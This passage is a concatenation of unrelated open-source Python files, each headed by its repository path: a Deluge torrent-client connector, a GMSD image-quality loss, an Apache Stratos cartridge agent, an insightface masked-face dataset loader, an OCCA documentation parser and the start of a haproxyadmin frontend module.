    print("Next Power of 2 " + str(nextPowOf2(n)))
|
core/downloaders/deluge.py | rikbarker/watcher | 194 | 11086996 | import logging
import json
import urllib2
import zlib
from lib.deluge_client import DelugeRPCClient
import core
from core.helpers import Torrent, Url
logging = logging.getLogger(__name__)
class DelugeRPC(object):
@staticmethod
def test_connection(data):
''' Tests connectivity to deluge daemon rpc
data: dict of deluge server information
Tests if we can open a socket to the rpc
Return True on success or str error message on failure
'''
host = data['host']
port = int(data['port'])
user = data['user']
password = data['pass']
client = DelugeRPCClient(host, port, user, password)
try:
error = client.connect()
if error:
return u'{}.'.format(error)
except Exception, e:
return str(e)
return True
@staticmethod
def add_torrent(data):
''' Adds torrent or magnet to Deluge
data: dict of torrrent/magnet information
Returns dict {'response': True, 'download_id': 'id'}
{'response': False, 'error': 'exception'}
'''
conf = core.CONFIG['Downloader']['Torrent']['DelugeRPC']
host = conf['host']
port = conf['port']
user = conf['user']
        password = conf['pass']
client = DelugeRPCClient(host, port, user, password)
try:
error = client.connect()
if error:
return {'response': False, 'error': error}
except Exception, e:
return {'response': False, 'error': str(e)[1:-1]}
try:
def_download_path = client.call('core.get_config')['download_location']
except Exception, e:
logging.error(u'Unable to get download path.', exc_info=True)
return {'response': False, 'error': 'Unable to get download path.'}
download_path = u'{}/{}'.format(def_download_path, conf['category'])
priority_keys = {
'Normal': 0,
'High': 128,
'Max': 255
}
options = {}
options['add_paused'] = conf['addpaused']
options['download_location'] = download_path
options['priority'] = priority_keys[conf['priority']]
if data['type'] == u'magnet':
try:
download_id = client.call('core.add_torrent_magnet', data['torrentfile'], options)
return {'response': True, 'downloadid': download_id}
except Exception, e:
logging.error(u'Unable to send magnet.', exc_info=True)
return {'response': False, 'error': str(e)[1:-1]}
elif data['type'] == u'torrent':
try:
download_id = client.call('core.add_torrent_url', data['torrentfile'], options)
return {'response': True, 'downloadid': download_id}
except Exception, e:
logging.error(u'Unable to send magnet.', exc_info=True)
return {'response': False, 'error': str(e)[1:-1]}
return
class DelugeWeb(object):
cookie = None
retry = False
command_id = 0
headers = {'Content-Type': 'application/json', 'User-Agent': 'Watcher'}
@staticmethod
def test_connection(data):
''' Tests connectivity to deluge web client
data: dict of deluge server information
Return True on success or str error message on failure
'''
host = data['host']
port = data['port']
password = data['pass']
url = u'{}:{}/json'.format(host, port)
return DelugeWeb._login(url, password)
@staticmethod
def add_torrent(data):
''' Adds torrent or magnet to deluge web api
data: dict of torrrent/magnet information
Adds torrents to default/path/<category>
Returns dict {'response': True, 'download_id': 'id'}
{'response': False, 'error': 'exception'}
'''
conf = core.CONFIG['Downloader']['Torrent']['DelugeWeb']
host = conf['host']
port = conf['port']
url = u'{}:{}/json'.format(host, port)
priority_keys = {
'Normal': 0,
'High': 128,
'Max': 255
}
# check cookie validity while getting default download dir
download_dir = DelugeWeb._get_download_dir(url)
if not download_dir:
password = conf['pass']
if DelugeWeb._login(url, password) is not True:
                return {'response': False, 'error': 'Incorrect username or password.'}
download_dir = DelugeWeb._get_download_dir(url)
if not download_dir:
return {'response': False, 'error': 'Unable to get path information.'}
# if we got download_dir we can connect.
download_dir = u'{}/{}'.format(download_dir, conf['category'])
# if file is a torrent, have deluge download it to a tmp dir
if data['type'] == 'torrent':
tmp_torrent_file = DelugeWeb._get_torrent_file(data['torrentfile'], url)
if tmp_torrent_file['response'] is True:
data['torrentfile'] = tmp_torrent_file['torrentfile']
else:
return {'response': False, 'error': tmp_torrent_file['error']}
torrent = {'path': data['torrentfile'], 'options': {}}
torrent['options']['add_paused'] = conf['addpaused']
torrent['options']['download_location'] = download_dir
torrent['options']['priority'] = priority_keys[conf['priority']]
command = {'method': 'web.add_torrents',
'params': [[torrent]],
'id': DelugeWeb.command_id
}
DelugeWeb.command_id += 1
post_data = json.dumps(command)
request = Url.request(url, post_data=post_data, headers=DelugeWeb.headers)
request.add_header('cookie', DelugeWeb.cookie)
try:
response = DelugeWeb._read(Url.open(request))
if response['result'] is True:
downloadid = Torrent.get_hash(data['torrentfile'])
return {'response': True, 'downloadid': downloadid}
else:
return {'response': False, 'error': response['error']}
except (SystemExit, KeyboardInterrupt):
raise
except Exception, e:
logging.error(u'Delugeweb add_torrent', exc_info=True)
return {'response': False, 'error': str(e)[1:-1]}
@staticmethod
def _get_torrent_file(torrent_url, deluge_url):
command = {'method': 'web.download_torrent_from_url',
'params': [torrent_url],
'id': DelugeWeb.command_id
}
DelugeWeb.command_id += 1
post_data = json.dumps(command)
request = Url.request(deluge_url, post_data=post_data, headers=DelugeWeb.headers)
request.add_header('cookie', DelugeWeb.cookie)
try:
response = DelugeWeb._read(Url.open(request))
if response['error'] is None:
return {'response': True, 'torrentfile': response['result']}
except (SystemExit, KeyboardInterrupt):
raise
except Exception, e: #noqa
logging.error(u'Delugeweb download_torrent_from_url', exc_info=True)
return {'response': False, 'error': str(e)[1:-1]}
@staticmethod
def _get_download_dir(url):
command = {'method': 'core.get_config_value',
'params': ['download_location'],
'id': DelugeWeb.command_id
}
DelugeWeb.command_id += 1
post_data = json.dumps(command)
request = Url.request(url, post_data=post_data, headers=DelugeWeb.headers)
request.add_header('cookie', DelugeWeb.cookie)
try:
response = DelugeWeb._read(Url.open(request))
return response['result']
except Exception, e:
logging.error(u'delugeweb get_download_dir', exc_info=True)
return {'response': False, 'error': str(e.reason)[1:-1]}
@staticmethod
def _read(response):
''' Reads gzipped json response into dict
'''
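        # wbits = 16 + MAX_WBITS tells zlib to expect a gzip wrapper around the
        # deflate stream, which is how the Deluge web UI returns its JSON.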
return json.loads(zlib.decompress(response, 16+zlib.MAX_WBITS))
@staticmethod
def _login(url, password):
command = {'method': 'auth.login',
'params': [password],
'id': DelugeWeb.command_id
}
DelugeWeb.command_id += 1
post_data = json.dumps(command)
request = Url.request(url, post_data, headers=DelugeWeb.headers)
try:
response = urllib2.urlopen(request)
DelugeWeb.cookie = response.headers.get('Set-Cookie')
if DelugeWeb.cookie is None:
return 'Incorrect password.'
if response.msg == 'OK':
return True
else:
return response.msg
except (SystemExit, KeyboardInterrupt):
raise
except Exception, e:
logging.error(u'DelugeWeb test_connection', exc_info=True)
return u'{}.'.format(e.reason)
|
fatiando/gridder/__init__.py | XuesongDing/fatiando | 179 | 11087031 | """
Create and operate on data grids, scatters, and profiles.
"""
from __future__ import absolute_import
from .slicing import inside, cut
from .interpolation import interp, interp_at, profile
from .padding import pad_array, unpad_array, pad_coords
from .point_generation import regular, scatter, circular_scatter
from .utils import spacing
|
loss/IQA/gmsd.py | milesgray/CALAE | 203 | 11087034 | import torch
from torch import nn
from torch.nn import functional as F
import numpy as np
from torchvision import transforms
class GMSD(nn.Module):
# Refer to http://www4.comp.polyu.edu.hk/~cslzhang/IQA/GMSD/GMSD.htm
def __init__(self, channels=3):
super(GMSD, self).__init__()
self.channels = channels
dx = (torch.Tensor([[1,0,-1],[1,0,-1],[1,0,-1]])/3.).unsqueeze(0).unsqueeze(0).repeat(channels,1,1,1)
dy = (torch.Tensor([[1,1,1],[0,0,0],[-1,-1,-1]])/3.).unsqueeze(0).unsqueeze(0).repeat(channels,1,1,1)
self.dx = nn.Parameter(dx, requires_grad=False)
self.dy = nn.Parameter(dy, requires_grad=False)
self.aveKernel = nn.Parameter(torch.ones(channels,1,2,2)/4., requires_grad=False)
def gmsd(self, img1, img2, T=170):
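        # Outline of the computation: 2x average-pool both images, take
        # Prewitt-style gradient magnitudes, build a per-pixel gradient
        # similarity map (T stabilises the ratio), then report its standard
        # deviation; a larger deviation indicates lower perceptual quality.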
Y1 = F.conv2d(img1, self.aveKernel, stride=2, padding =0, groups = self.channels)
Y2 = F.conv2d(img2, self.aveKernel, stride=2, padding =0, groups = self.channels)
IxY1 = F.conv2d(Y1, self.dx, stride=1, padding =1, groups = self.channels)
IyY1 = F.conv2d(Y1, self.dy, stride=1, padding =1, groups = self.channels)
gradientMap1 = torch.sqrt(IxY1**2 + IyY1**2+1e-12)
IxY2 = F.conv2d(Y2, self.dx, stride=1, padding =1, groups = self.channels)
IyY2 = F.conv2d(Y2, self.dy, stride=1, padding =1, groups = self.channels)
gradientMap2 = torch.sqrt(IxY2**2 + IyY2**2+1e-12)
quality_map = (2*gradientMap1*gradientMap2 + T)/(gradientMap1**2+gradientMap2**2 + T)
score = torch.std(quality_map.view(quality_map.shape[0],-1),dim=1)
return score
def forward(self, y, x, as_loss=True):
assert x.shape == y.shape
x = x * 255
y = y * 255
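        # Inputs are assumed to lie in [0, 1]; rescaling to [0, 255] keeps the
        # default stabilisation constant T=170 on its intended intensity scale.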
if as_loss:
score = self.gmsd(x, y)
return score.mean()
else:
with torch.no_grad():
score = self.gmsd(x, y)
return score
if __name__ == '__main__':
from PIL import Image
import argparse
from utils import prepare_image
parser = argparse.ArgumentParser()
parser.add_argument('--ref', type=str, default='images/r0.png')
parser.add_argument('--dist', type=str, default='images/r1.png')
args = parser.parse_args()
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
ref = prepare_image(Image.open(args.ref).convert("RGB")).to(device)
dist = prepare_image(Image.open(args.dist).convert("RGB")).to(device)
model = GMSD().to(device)
score = model(ref, dist, as_loss=False)
print('score: %.4f' % score.item())
# score: 0.1907
|
components/org.apache.stratos.python.cartridge.agent/src/main/python/cartridge.agent/cartridge.agent/agent.py | TanJay/stratos | 127 | 11087040 | #!/usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import time
from threading import Thread
import publisher
from logpublisher import *
from modules.event.application.signup.events import *
from modules.event.domain.mapping.events import *
import modules.event.eventhandler as event_handler
from modules.event.instance.notifier.events import *
from modules.event.tenant.events import *
from modules.event.topology.events import *
from subscriber import EventSubscriber
class CartridgeAgent(object):
def __init__(self):
Config.initialize_config()
self.__terminated = False
self.__log = LogFactory().get_log(__name__)
mb_urls = Config.mb_urls.split(",")
mb_uname = Config.mb_username
mb_pwd = Config.mb_password
self.__inst_topic_subscriber = EventSubscriber(constants.INSTANCE_NOTIFIER_TOPIC, mb_urls, mb_uname, mb_pwd)
self.__tenant_topic_subscriber = EventSubscriber(constants.TENANT_TOPIC, mb_urls, mb_uname, mb_pwd)
self.__app_topic_subscriber = EventSubscriber(constants.APPLICATION_SIGNUP, mb_urls, mb_uname, mb_pwd)
self.__topology_event_subscriber = EventSubscriber(constants.TOPOLOGY_TOPIC, mb_urls, mb_uname, mb_pwd)
def run_agent(self):
# Start topology event receiver thread
self.register_topology_event_listeners()
if Config.lvs_virtual_ip is None or str(Config.lvs_virtual_ip).strip() == "":
self.__log.debug("LVS Virtual IP is not defined")
else:
event_handler.create_dummy_interface()
# request complete topology event from CC by publishing CompleteTopologyRequestEvent
publisher.publish_complete_topology_request_event()
# wait until complete topology message is received to get LB IP
self.wait_for_complete_topology()
# wait for member initialized event
while not Config.initialized:
self.__log.debug("Waiting for cartridge agent to be initialized...")
time.sleep(1)
# Start instance notifier listener thread
self.register_instance_topic_listeners()
# Start tenant event receiver thread
self.register_tenant_event_listeners()
# start application signup event listener
self.register_application_signup_event_listeners()
# request complete tenant event from CC by publishing CompleteTenantRequestEvent
publisher.publish_complete_tenant_request_event()
# Execute instance started shell script
event_handler.on_instance_started_event()
# Publish instance started event
publisher.publish_instance_started_event()
# Execute start servers extension
try:
event_handler.start_server_extension()
except Exception as ex:
self.__log.exception("Error processing start servers event: %s" % ex)
# check if artifact management is required before publishing instance activated event
repo_url = Config.repo_url
if repo_url is None or str(repo_url).strip() == "":
self.__log.info("No artifact repository found")
publisher.publish_instance_activated_event()
event_handler.on_instance_activated_event()
else:
# instance activated event will be published in artifact updated event handler
self.__log.info(
"Artifact repository found, waiting for artifact updated event to checkout artifacts: [repo_url] %s",
repo_url)
persistence_mapping_payload = Config.persistence_mappings
if persistence_mapping_payload is not None:
event_handler.volume_mount_extension(persistence_mapping_payload)
# start log publishing thread
log_publish_manager = None
if DataPublisherConfiguration.get_instance().enabled:
log_file_paths = Config.log_file_paths
if log_file_paths is None:
self.__log.exception("No valid log file paths found, no logs will be published")
else:
self.__log.debug("Starting Log Publisher Manager: [Log file paths] %s" % ", ".join(log_file_paths))
log_publish_manager = LogPublisherManager(log_file_paths)
log_publish_manager.start()
# run until terminated
while not self.__terminated:
time.sleep(5)
if DataPublisherConfiguration.get_instance().enabled:
log_publish_manager.terminate_all_publishers()
def terminate(self):
"""
Allows the CartridgeAgent thread to be terminated
:return: void
"""
self.__terminated = True
def register_instance_topic_listeners(self):
self.__log.debug("Starting instance notifier event message receiver thread")
self.__inst_topic_subscriber.register_handler("ArtifactUpdatedEvent", Handlers.on_artifact_updated)
self.__inst_topic_subscriber.register_handler("InstanceCleanupMemberEvent", Handlers.on_instance_cleanup_member)
self.__inst_topic_subscriber.register_handler(
"InstanceCleanupClusterEvent", Handlers.on_instance_cleanup_cluster)
self.__inst_topic_subscriber.start()
self.__log.info("Instance notifier event message receiver thread started")
# wait till subscribed to continue
while not self.__inst_topic_subscriber.is_subscribed():
time.sleep(1)
def register_topology_event_listeners(self):
self.__log.debug("Starting topology event message receiver thread")
self.__topology_event_subscriber.register_handler("MemberActivatedEvent", Handlers.on_member_activated)
self.__topology_event_subscriber.register_handler("MemberTerminatedEvent", Handlers.on_member_terminated)
self.__topology_event_subscriber.register_handler("MemberSuspendedEvent", Handlers.on_member_suspended)
self.__topology_event_subscriber.register_handler("CompleteTopologyEvent", Handlers.on_complete_topology)
self.__topology_event_subscriber.register_handler("MemberStartedEvent", Handlers.on_member_started)
self.__topology_event_subscriber.register_handler("MemberCreatedEvent", Handlers.on_member_created)
self.__topology_event_subscriber.register_handler("MemberInitializedEvent", Handlers.on_member_initialized)
self.__topology_event_subscriber.start()
self.__log.info("Cartridge agent topology receiver thread started")
# wait till subscribed to continue
while not self.__topology_event_subscriber.is_subscribed():
time.sleep(1)
def register_tenant_event_listeners(self):
self.__log.debug("Starting tenant event message receiver thread")
self.__tenant_topic_subscriber.register_handler("DomainMappingAddedEvent",
Handlers.on_domain_mapping_added)
self.__tenant_topic_subscriber.register_handler("DomainsMappingRemovedEvent",
Handlers.on_domain_mapping_removed)
self.__tenant_topic_subscriber.register_handler("CompleteTenantEvent", Handlers.on_complete_tenant)
self.__tenant_topic_subscriber.register_handler("TenantSubscribedEvent", Handlers.on_tenant_subscribed)
self.__tenant_topic_subscriber.start()
self.__log.info("Tenant event message receiver thread started")
# wait till subscribed to continue
while not self.__tenant_topic_subscriber.is_subscribed():
time.sleep(1)
def register_application_signup_event_listeners(self):
self.__log.debug("Starting application signup event message receiver thread")
self.__app_topic_subscriber.register_handler("ApplicationSignUpRemovedEvent",
Handlers.on_application_signup_removed)
self.__app_topic_subscriber.start()
self.__log.info("Application signup event message receiver thread started")
# wait till subscribed to continue
while not self.__app_topic_subscriber.is_subscribed():
time.sleep(1)
def wait_for_complete_topology(self):
while not TopologyContext.initialized:
self.__log.info("Waiting for complete topology event...")
time.sleep(5)
self.__log.info("Complete topology event received")
class Handlers(object):
"""
Handler methods for message broker events
"""
__log = LogFactory().get_log(__name__)
__tenant_context_initialized = False
@staticmethod
def on_artifact_updated(msg):
event_obj = ArtifactUpdatedEvent.create_from_json(msg.payload)
event_handler.on_artifact_updated_event(event_obj)
@staticmethod
def on_instance_cleanup_member(msg):
member_in_payload = Config.member_id
event_obj = InstanceCleanupMemberEvent.create_from_json(msg.payload)
member_in_event = event_obj.member_id
if member_in_payload == member_in_event:
event_handler.on_instance_cleanup_member_event()
@staticmethod
def on_instance_cleanup_cluster(msg):
event_obj = InstanceCleanupClusterEvent.create_from_json(msg.payload)
cluster_in_payload = Config.cluster_id
cluster_in_event = event_obj.cluster_id
instance_in_payload = Config.cluster_instance_id
instance_in_event = event_obj.cluster_instance_id
if cluster_in_event == cluster_in_payload and instance_in_payload == instance_in_event:
event_handler.on_instance_cleanup_cluster_event()
@staticmethod
def on_member_created(msg):
Handlers.__log.debug("Member created event received: %r" % msg.payload)
@staticmethod
def on_member_initialized(msg):
Handlers.__log.debug("Member initialized event received: %r" % msg.payload)
event_obj = MemberInitializedEvent.create_from_json(msg.payload)
if not TopologyContext.initialized:
return
event_handler.on_member_initialized_event(event_obj)
@staticmethod
def on_member_activated(msg):
Handlers.__log.debug("Member activated event received: %r" % msg.payload)
if not TopologyContext.initialized:
return
event_obj = MemberActivatedEvent.create_from_json(msg.payload)
event_handler.on_member_activated_event(event_obj)
@staticmethod
def on_member_terminated(msg):
Handlers.__log.debug("Member terminated event received: %r" % msg.payload)
if not TopologyContext.initialized:
return
event_obj = MemberTerminatedEvent.create_from_json(msg.payload)
event_handler.on_member_terminated_event(event_obj)
@staticmethod
def on_member_suspended(msg):
Handlers.__log.debug("Member suspended event received: %r" % msg.payload)
if not TopologyContext.initialized:
return
event_obj = MemberSuspendedEvent.create_from_json(msg.payload)
event_handler.on_member_suspended_event(event_obj)
@staticmethod
def on_complete_topology(msg):
event_obj = CompleteTopologyEvent.create_from_json(msg.payload)
TopologyContext.update(event_obj.topology)
if not TopologyContext.initialized:
TopologyContext.initialized = True
Handlers.__log.info("Topology initialized from complete topology event")
event_handler.on_complete_topology_event(event_obj)
Handlers.__log.debug("Topology context updated with [topology] %r" % event_obj.topology.json_str)
@staticmethod
def on_member_started(msg):
Handlers.__log.debug("Member started event received: %r" % msg.payload)
if not TopologyContext.initialized:
return
event_obj = MemberStartedEvent.create_from_json(msg.payload)
event_handler.on_member_started_event(event_obj)
@staticmethod
def on_domain_mapping_added(msg):
Handlers.__log.debug("Subscription domain added event received : %r" % msg.payload)
event_obj = DomainMappingAddedEvent.create_from_json(msg.payload)
event_handler.on_domain_mapping_added_event(event_obj)
@staticmethod
def on_domain_mapping_removed(msg):
Handlers.__log.debug("Subscription domain removed event received : %r" % msg.payload)
event_obj = DomainMappingRemovedEvent.create_from_json(msg.payload)
event_handler.on_domain_mapping_removed_event(event_obj)
@staticmethod
def on_complete_tenant(msg):
event_obj = CompleteTenantEvent.create_from_json(msg.payload)
TenantContext.update(event_obj.tenants)
if not Handlers.__tenant_context_initialized:
Handlers.__log.info("Tenant context initialized from complete tenant event")
Handlers.__tenant_context_initialized = True
event_handler.on_complete_tenant_event(event_obj)
Handlers.__log.debug("Tenant context updated with [tenant list] %r" % event_obj.tenant_list_json)
@staticmethod
def on_tenant_subscribed(msg):
Handlers.__log.debug("Tenant subscribed event received: %r" % msg.payload)
event_obj = TenantSubscribedEvent.create_from_json(msg.payload)
event_handler.on_tenant_subscribed_event(event_obj)
@staticmethod
def on_application_signup_removed(msg):
Handlers.__log.debug("Application signup removed event received: %r" % msg.payload)
event_obj = ApplicationSignUpRemovedEvent.create_from_json(msg.payload)
event_handler.on_application_signup_removed_event(event_obj)
def check_termination(agent_obj):
terminate = False
terminator_file_path = os.path.abspath(os.path.dirname(__file__)) + "/terminator.txt"
while not terminate:
time.sleep(60)
try:
with open(terminator_file_path, 'r') as f:
file_output = f.read()
terminate = True if "true" in file_output else False
except IOError:
pass
log.info("Shutting down Stratos cartridge agent...")
agent_obj.terminate()
if __name__ == "__main__":
log = LogFactory().get_log(__name__)
cartridge_agent = CartridgeAgent()
try:
log.info("Starting Stratos cartridge agent...")
task_thread = Thread(target=check_termination, args=(cartridge_agent,))
task_thread.start()
cartridge_agent.run_agent()
except Exception as e:
log.exception("Cartridge Agent Exception: %r" % e)
log.info("Terminating Stratos cartridge agent...")
cartridge_agent.terminate()
|
semanticpy/transform/transform.py | thecapacity/semanticpy | 116 | 11087048 | <reponame>thecapacity/semanticpy<filename>semanticpy/transform/transform.py
from semanticpy.matrix_formatter import MatrixFormatter
from scipy import array
class Transform:
def __init__(self, matrix):
self.matrix = array(matrix, dtype=float)
def __repr__(self):
MatrixFormatter(self.matrix).pretty_print
|
challenges/iccv21-mfr/dataset_mask.py | qaz734913414/insightface | 12,377 | 11087053 | import numbers
import os
import queue as Queue
import threading
import mxnet as mx
import numpy as np
import torch
from torch.utils.data import DataLoader, Dataset
from torchvision import transforms
import cv2
import albumentations as A
from albumentations.pytorch import ToTensorV2
from insightface.app import MaskAugmentation
class BackgroundGenerator(threading.Thread):
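    # Producer thread: pulls items from the wrapped generator into a bounded
    # queue (max_prefetch) so the next batch is usually ready before the
    # training loop asks for it; a None sentinel marks exhaustion.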
def __init__(self, generator, local_rank, max_prefetch=6):
super(BackgroundGenerator, self).__init__()
self.queue = Queue.Queue(max_prefetch)
self.generator = generator
self.local_rank = local_rank
self.daemon = True
self.start()
def run(self):
torch.cuda.set_device(self.local_rank)
for item in self.generator:
self.queue.put(item)
self.queue.put(None)
def next(self):
next_item = self.queue.get()
if next_item is None:
raise StopIteration
return next_item
def __next__(self):
return self.next()
def __iter__(self):
return self
class DataLoaderX(DataLoader):
def __init__(self, local_rank, **kwargs):
super(DataLoaderX, self).__init__(**kwargs)
self.stream = torch.cuda.Stream(local_rank)
self.local_rank = local_rank
def __iter__(self):
self.iter = super(DataLoaderX, self).__iter__()
self.iter = BackgroundGenerator(self.iter, self.local_rank)
self.preload()
return self
def preload(self):
self.batch = next(self.iter, None)
if self.batch is None:
return None
with torch.cuda.stream(self.stream):
for k in range(len(self.batch)):
self.batch[k] = self.batch[k].to(device=self.local_rank,
non_blocking=True)
def __next__(self):
torch.cuda.current_stream().wait_stream(self.stream)
batch = self.batch
if batch is None:
raise StopIteration
self.preload()
return batch
class MXFaceDataset(Dataset):
def __init__(self, root_dir, local_rank, aug_modes="brightness=0.1+mask=0.1"):
super(MXFaceDataset, self).__init__()
default_aug_probs = {
'brightness' : 0.2,
'blur': 0.1,
'mask': 0.1,
}
aug_mode_list = aug_modes.lower().split('+')
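        # aug_modes is a '+'-separated list of "name" or "name=prob" entries,
        # e.g. "brightness=0.1+mask=0.1"; entries without "=prob" fall back to
        # the probabilities in default_aug_probs above.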
aug_mode_map = {}
for aug_mode_str in aug_mode_list:
_aug = aug_mode_str.split('=')
aug_key = _aug[0]
if len(_aug)>1:
aug_prob = float(_aug[1])
else:
aug_prob = default_aug_probs[aug_key]
aug_mode_map[aug_key] = aug_prob
transform_list = []
self.mask_aug = False
self.mask_prob = 0.0
key = 'mask'
if key in aug_mode_map:
self.mask_aug = True
self.mask_prob = aug_mode_map[key]
transform_list.append(
MaskAugmentation(mask_names=['mask_white', 'mask_blue', 'mask_black', 'mask_green'], mask_probs=[0.4, 0.4, 0.1, 0.1], h_low=0.33, h_high=0.4, p=self.mask_prob)
)
if local_rank==0:
print('data_transform_list:', transform_list)
print('mask:', self.mask_aug, self.mask_prob)
key = 'brightness'
if key in aug_mode_map:
prob = aug_mode_map[key]
transform_list.append(
A.RandomBrightnessContrast(brightness_limit=0.125, contrast_limit=0.05, p=prob)
)
key = 'blur'
if key in aug_mode_map:
prob = aug_mode_map[key]
transform_list.append(
A.ImageCompression(quality_lower=30, quality_upper=80, p=prob)
)
transform_list.append(
A.MedianBlur(blur_limit=(1,7), p=prob)
)
transform_list.append(
A.MotionBlur(blur_limit=(5,12), p=prob)
)
transform_list += \
[
A.HorizontalFlip(p=0.5),
A.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5]),
ToTensorV2(),
]
        # here, the input to the albumentations (A) transform is an RGB cv2 image
self.transform = A.Compose(
transform_list
)
self.root_dir = root_dir
self.local_rank = local_rank
path_imgrec = os.path.join(root_dir, 'train.rec')
path_imgidx = os.path.join(root_dir, 'train.idx')
self.imgrec = mx.recordio.MXIndexedRecordIO(path_imgidx, path_imgrec, 'r')
s = self.imgrec.read_idx(0)
header, _ = mx.recordio.unpack(s)
#print(header)
#print(len(self.imgrec.keys))
if header.flag > 0:
if len(header.label)==2:
self.imgidx = np.array(range(1, int(header.label[0])))
else:
self.imgidx = np.array(list(self.imgrec.keys))
else:
self.imgidx = np.array(list(self.imgrec.keys))
#print('imgidx len:', len(self.imgidx))
def __getitem__(self, index):
idx = self.imgidx[index]
s = self.imgrec.read_idx(idx)
header, img = mx.recordio.unpack(s)
hlabel = header.label
#print('hlabel:', hlabel.__class__)
sample = mx.image.imdecode(img).asnumpy()
if not isinstance(hlabel, numbers.Number):
idlabel = hlabel[0]
else:
idlabel = hlabel
label = torch.tensor(idlabel, dtype=torch.long)
if self.transform is not None:
sample = self.transform(image=sample, hlabel=hlabel)['image']
return sample, label
def __len__(self):
return len(self.imgidx)
if __name__ == "__main__":
import argparse, cv2, copy
parser = argparse.ArgumentParser(description='dataset test')
parser.add_argument('--dataset', type=str, help='dataset path')
parser.add_argument('--samples', type=int, default=256, help='')
parser.add_argument('--cols', type=int, default=16, help='')
args = parser.parse_args()
assert args.samples%args.cols==0
assert args.cols%2==0
samples = args.samples
cols = args.cols
rows = args.samples // args.cols
dataset = MXFaceDataset(root_dir=args.dataset, local_rank=0, aug_modes='mask=1.0')
dataset.transform = A.Compose([t for t in dataset.transform if not isinstance(t, (A.Normalize, ToTensorV2))])
dataset_0 = copy.deepcopy(dataset)
#dataset_0.transform = None
dataset_1 = copy.deepcopy(dataset)
#dataset_1.transform = A.Compose(
# [
# A.RandomBrightnessContrast(brightness_limit=0.125, contrast_limit=0.05, p=1.0),
# A.ImageCompression(quality_lower=30, quality_upper=80, p=1.0),
# A.MedianBlur(blur_limit=(1,7), p=1.0),
# A.MotionBlur(blur_limit=(5,12), p=1.0),
# A.Affine(scale=(0.92, 1.08), translate_percent=(-0.06, 0.06), rotate=(-6, 6), shear=None, interpolation=cv2.INTER_LINEAR, p=1.0),
# ]
#)
fig = np.zeros( (112*rows, 112*cols, 3), dtype=np.uint8 )
for idx in range(samples):
if idx%2==0:
image, _ = dataset_0[idx//2]
else:
image, _ = dataset_1[idx//2]
row_idx = idx // cols
col_idx = idx % cols
fig[row_idx*112:(row_idx+1)*112, col_idx*112:(col_idx+1)*112,:] = image[:,:,::-1] # to bgr
cv2.imwrite("./datasets.png", fig)
|
3rd_party/occa/scripts/docs/api_docgen/file_parser.py | RonRahaman/nekRS | 312 | 11087072 | <filename>3rd_party/occa/scripts/docs/api_docgen/file_parser.py
'''
Parse doxygen output files
'''
from typing import Any, Dict, List, Tuple
from .types import *
from .system_commands import *
def alias_path(path: str,
node_id: str,
ordered_path_aliases: List[Tuple[str, str]]) -> Tuple[str, str]:
for (alias_path, alias_id) in ordered_path_aliases:
if path.startswith(alias_path):
return (
path.replace(path, alias_id),
f'{alias_id}.{node_id}',
)
return (path, node_id)
def get_global_id_map(tree: Any, nodes: List[Any]) -> Dict[str, str]:
paths = sorted([
[tree.getpath(node), Documentation.parse(node)]
for node in nodes
])
global_id_map = {}
ordered_path_ids: List[Tuple[str, str]] = []
for [path, node_info] in paths:
# Build aliases from short names -> long names
(aliased_path, aliased_id) = alias_path(
path,
node_info.id_,
ordered_path_ids
)
# Build the ids backwards to match longer -> shorter to find
# the longest alias possible
ordered_path_ids.insert(0, (aliased_path, aliased_id))
global_id_map[path] = aliased_id
return global_id_map
def get_doc_tree(filename: str) -> Dict[str, Any]:
(tree, root) = parse_xml_file(filename)
nodes = get_documented_definition_nodes(root)
global_id_map = get_global_id_map(tree, nodes)
doc_tree: Dict[str, Any] = {}
for node in nodes:
# Split by . and append a CHILDREN_FIELD in between
# Example:
# device.malloc
# ->
# ['device', CHILDREN_FIELD, 'malloc]
path = []
for entry in global_id_map[tree.getpath(node)].split('.'):
path.append(entry)
path.append(CHILDREN_FIELD)
path.pop()
doc_node = nested_get(doc_tree, path)
if DOC_FIELD not in doc_node:
doc_node[DOC_FIELD] = DocNode(
definitions=[],
)
doc_node[DOC_FIELD].definitions.append(
Definition.parse(node)
)
return doc_tree
def finalize_doc_tree(doc_tree: Dict[str, Any]) -> List[DocTreeNode]:
return [
DocTreeNode(
definitions=doc_info[DOC_FIELD].definitions,
children=finalize_doc_tree(
doc_info.get(CHILDREN_FIELD, {})
)
)
for doc_info in doc_tree.values()
]
def load_documentation() -> DocTree:
# Merge all documented files into one tree
doc_tree = {}
for documented_file in find_documented_files():
doc_tree.update(
get_doc_tree(documented_file)
)
return DocTree(
roots=finalize_doc_tree(doc_tree)
)
|
haproxyadmin/frontend.py | jrassier/haproxyadmin | 104 | 11087094 | # -*- coding: utf-8 -*-
#
# pylint: disable=superfluous-parens
#
"""
haproxyadmin.frontend
~~~~~~~~~~~~~~~~~~~~~
This module provides the :class:`Frontend <.Frontend>` class. This class can
be used to run operations on a frontend and retrieve statistics.
"""
from haproxyadmin.utils import (calculate, cmd_across_all_procs, converter,
check_command, should_die, compare_values)
FRONTEND_METRICS = [
'bin',
'bout',
'comp_byp',
'comp_in',
'comp_out',
'comp_rsp',
'dreq',
'dresp',
'ereq',
'hrsp_1xx',
'hrsp_2xx',
'hrsp_3xx',
'hrsp_4xx',
'hrsp_5xx',
'hrsp_other',
'rate',
'rate_lim',
'rate_max',
'req_rate',
'req_rate_max',
'req_tot',
'scur',
'slim',
'smax',
'stot',
]
class Frontend(object):
"""Build a user-created :class:`Frontend` for a single frontend.
:param frontend_per_proc: list of :class:`._Frontend` objects.
:type frontend_per_proc: ``list``
:rtype: a :class:`Frontend`.
"""
def __init__(self, frontend_per_proc):
self._frontend_per_proc = frontend_per_proc
self._name = self._frontend_per_proc[0].name
# built-in comparison operator is adjusted to support
# if 'x' in list_of_frontend_obj
# x == frontend_obj
def __eq__(self, other):
if isinstance(other, Frontend):
return (self.name == other.name)
elif isinstance(other, str):
return (self.name == other)
else:
